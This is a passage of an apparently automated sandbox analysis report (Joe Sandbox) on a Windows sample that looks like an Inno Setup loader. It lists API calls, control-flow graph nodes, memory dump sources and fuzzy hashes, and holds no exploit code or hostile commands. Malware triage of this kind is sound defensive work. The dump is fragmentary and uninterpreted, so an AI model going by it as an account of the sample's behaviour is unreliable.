                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                          • API String ID: 1646373207-2130885113
                                                          • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                          • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                          • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                          • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                          • SetWindowLongA.USER32(00020416,000000FC,00409918), ref: 0040A148
                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000,00409A77), ref: 00409A14
                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000), ref: 00409A28
                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90), ref: 00409A5C
                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                          • 73A25CF0.USER32(00020416,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                          • API String ID: 978128352-3001827809
                                                          • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                          • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                          • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                          • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000,00409A77), ref: 00409A14
                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90,00000000), ref: 00409A28
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0210178C,00409A90), ref: 00409A5C
                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0210178C), ref: 0040966C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                          • String ID: D
                                                          • API String ID: 3356880605-2746444292
                                                          • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                          • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                          • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                          • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                          Control-flow Graph

                                                          APIs
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: .tmp$y@
                                                          • API String ID: 2030045667-2396523267
                                                          • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                          • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                          • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                          • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                          Control-flow Graph

                                                          APIs
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: .tmp$y@
                                                          • API String ID: 2030045667-2396523267
                                                          • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                          • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                          • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                          • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID: .tmp
                                                          • API String ID: 1375471231-2986845003
                                                          • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                          • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                          • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                          • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 330 407787 324->330 331 4077f9 324->331 325->326 328 407700-407704 326->328 329 4076f4-4076fb call 4073ec 326->329 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 339 407803-407819 333->339 341 407791-407792 333->341 334->339 337 407841-407843 335->337 336->334 340 40785b-40785c 337->340 339->340 351 40781b 339->351 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 360 407820-407823 343->360 361 407890-407893 343->361 347 407743 344->347 348 4077b5 344->348 345->348 352 407746-407747 347->352 353 4077b9 347->353 356 4077b6-4077b7 348->356 357 4077f7-4077f8 348->357 358 40781e-40781f 351->358 352->321 359 4077bb-4077cd 352->359 353->359 356->353 357->331 358->360 359->337 363 4077cf-4077d4 359->363 364 407824 360->364 365 407898 360->365 361->365 363->335 371 4077d6-4077de 363->371 369 407825 364->369 370 40789a 364->370 365->370 367->366 367->367 372 407896-407897 369->372 373 407826-40782d 369->373 374 40789f 370->374 371->324 384 4077e0 371->384 372->365 376 4078a1 373->376 377 40782f 373->377 374->376 378 4078a3 376->378 379 4078ac 376->379 381 407832-407833 377->381 382 4078a5-4078aa 377->382 378->382 383 4078ae-4078af 379->383 381->335 381->358 382->383 383->374 385 4078b1-4078bd 383->385 384->357 385->365 386 4078bf-4078c0 385->386
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLibraryLoadMode
                                                          • String ID:
                                                          • API String ID: 2987862817-0
                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastRead
                                                          • String ID:
                                                          • API String ID: 1948546556-0
                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree
                                                          • String ID:
                                                          • API String ID: 2087232378-0
                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                          • String ID:
                                                          • API String ID: 1658689577-0
                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID:
                                                          • API String ID: 442123175-0
                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                          APIs
